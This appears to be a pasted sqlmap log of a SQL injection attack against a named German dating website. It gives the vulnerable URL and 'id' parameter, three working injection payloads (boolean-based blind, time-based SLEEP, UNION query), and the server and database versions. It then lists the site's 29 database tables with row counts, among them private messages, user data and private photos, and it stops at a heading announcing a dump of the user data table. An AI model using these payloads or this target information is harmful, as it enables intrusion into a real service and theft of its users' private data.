https://www.braunschweigflirt.de/profil.fotos.notiz.php?id=test'
sqlmap identified the following injection point(s) with a total of 132 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-9672' OR 6069=6069-- pEAw Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=test' AND (SELECT 1285 FROM (SELECT(SLEEP(5)))NooW)-- FYVt Type: UNION query Title: Generic UNION query (random number) - 1 column Payload: id=test' UNION ALL SELECT CONCAT(0x71706b6a71,0x4b414a4b4145506c426d57626a5853556d6e496c5347714878464567686667667052556b706c7841,0x71626b7171)-- Bvll --- web application technology: Apache, PHP 5.3.29 back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] braksovb_db1 [*] information_schema
Database: braksovb_db1 [29 tables] +------------------------+---------+ | Table | Entries | +------------------------+---------+ | nachrichten | 959281 | | protokoll | 112612 | | profilbesucher | 89096 | | ref | 44779 | | orte | 44216 | | user_besucher | 43015 | | user_status | 43015 | | user_daten | 35203 | | user_profile | 34503 | | privatfotos | 28147 | | user_fotos | 13034 | | favoriten | 12101 | | user_gb | 11023 | | bad_emails | 8816 | | ignorierliste | 3764 | | geblockt | 3645 | | statistik | 2820 | | user_auswahl | 217 | | kleinanzeigen | 124 | | user_echtheitfotos | 123 | | kleinanzeigen_rubriken | 16 | | login | 8 | | kunden | 6 | | gesperrt | 1 | | rundmail | 1 | | status | 1 | +------------------------+---------+
Dump der "user_daten":